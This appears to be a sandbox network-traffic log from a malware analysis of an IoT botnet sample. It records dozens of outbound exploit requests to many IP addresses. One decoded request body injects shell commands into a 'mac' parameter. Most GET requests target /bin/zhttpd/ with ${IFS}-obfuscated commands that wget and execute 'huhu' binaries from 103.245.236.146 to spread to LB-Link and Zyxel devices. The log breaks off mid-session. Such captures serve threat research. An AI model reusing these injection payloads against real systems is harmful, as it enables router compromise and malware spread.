                                                  Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                  Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.146/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm *mpsl*;
                                                  Jan 19, 2024 18:24:08.669337034 CET629INHTTP/1.1 400 Bad Request
                                                  Date: Fri, 19 Jan 2024 17:24:08 GMT
                                                  Server: Apache/2.4.58 (Unix)
                                                  Content-Length: 437
                                                  Connection: close
                                                  Content-Type: text/html; charset=iso-8859-1
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 52 65 61 73 6f 6e 3a 20 59 6f 75 27 72 65 20 73 70 65 61 6b 69 6e 67 20 70 6c 61 69 6e 20 48 54 54 50 20 74 6f 20 61 6e 20 53 53 4c 2d 65 6e 61 62 6c 65 64 20 73 65 72 76 65 72 20 70 6f 72 74 2e 3c 62 72 20 2f 3e 0a 20 49 6e 73 74 65 61 64 20 75 73 65 20 74 68 65 20 48 54 54 50 53 20 73 63 68 65 6d 65 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 55 52 4c 2c 20 70 6c 65 61 73 65 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 6c 6f 63 61 6c 68 6f 73 74 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br />Reason: You're speaking plain HTTP to an SSL-enabled server port.<br /> Instead use the HTTPS scheme to access this URL, please.<br /></p><hr><address>Apache/2.4.58 (Unix) Server at localhost Port 8080</address></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7608192.168.2.1341054183.155.99.146443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.324721098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7609192.168.2.1342138105.222.201.149443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.324760914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7610192.168.2.134349459.44.134.163443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.324803114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7611192.168.2.1353280169.213.7.153443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.324850082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7612192.168.2.134977874.246.215.43443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.324873924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7613192.168.2.1342192142.211.120.35443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.324940920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7614192.168.2.1341174212.21.253.121443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.324975014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7615192.168.2.135763278.238.193.4443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.325031042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7616192.168.2.135400812.112.159.39443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.325057030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7617192.168.2.1332800147.144.249.56443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.325108051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7618192.168.2.135165219.191.60.125443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.325135946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7619192.168.2.1353576187.10.99.219443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.325186968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7620192.168.2.133652888.14.86.15443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.325213909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7621192.168.2.1355290173.138.181.136443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.325262070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7622192.168.2.1349176172.147.179.174443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.325284958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7623192.168.2.135160019.252.161.165443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.325318098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7624192.168.2.135300836.220.64.82443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.325350046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7625192.168.2.1350996147.104.113.78443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.325387955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7626192.168.2.1342732194.254.88.61443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.325408936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7627192.168.2.1355264142.228.124.199443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.325459957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7628192.168.2.1350160220.75.60.159443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.325494051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7629192.168.2.1350076103.160.21.31443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.325551033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7630192.168.2.1347854111.185.5.240443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.325589895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7631192.168.2.135230824.146.191.198443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.325622082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7632192.168.2.134909097.32.250.103443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.325676918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7633192.168.2.1337396166.39.239.56443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.325705051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7634192.168.2.133462846.72.60.100443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.325737953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7635192.168.2.1334786140.52.119.197443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.325777054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7636192.168.2.133505032.129.37.175443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.325840950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7637192.168.2.134644846.77.180.54443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.325840950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7638192.168.2.1350250205.250.188.37443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.325881958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7639192.168.2.1342094124.24.25.166443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.325946093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7640192.168.2.1352414110.103.211.71443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.325974941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7641192.168.2.1348090168.97.95.133443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.326003075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7642192.168.2.134964431.42.223.203443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.326061010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7643192.168.2.135708025.108.171.169443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.326101065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7644192.168.2.135328474.135.112.203443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.326133966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7645192.168.2.1334490183.246.240.81443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.326195002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7646192.168.2.133554669.130.199.123443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.326212883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7647192.168.2.1343738100.204.137.164443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.326270103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7648192.168.2.13508585.36.20.13443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.326313019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7649192.168.2.1355994174.11.191.39443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.326334953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7650192.168.2.1348558169.61.10.203443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.326385975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7651192.168.2.1353866146.35.83.110443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.326440096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7652192.168.2.1352726114.98.148.123443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.326508999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7653192.168.2.133346439.94.3.79443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.326533079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7654192.168.2.134343670.99.142.121443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.326580048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7655192.168.2.134354285.1.178.61443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.326628923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7656192.168.2.1351004213.155.84.216443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.326685905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7657192.168.2.1352098121.194.15.143443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.326724052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7658192.168.2.135190483.243.155.242443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.326915026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7659192.168.2.134869045.225.199.148443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.326944113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7660192.168.2.1335726179.19.150.223443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.326971054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7661192.168.2.1334464129.20.209.202443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.327022076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7662192.168.2.1344550196.26.213.218443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.327069998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7663192.168.2.1343406195.47.36.193443
                                                  TimestampBytes transferredDirectionData
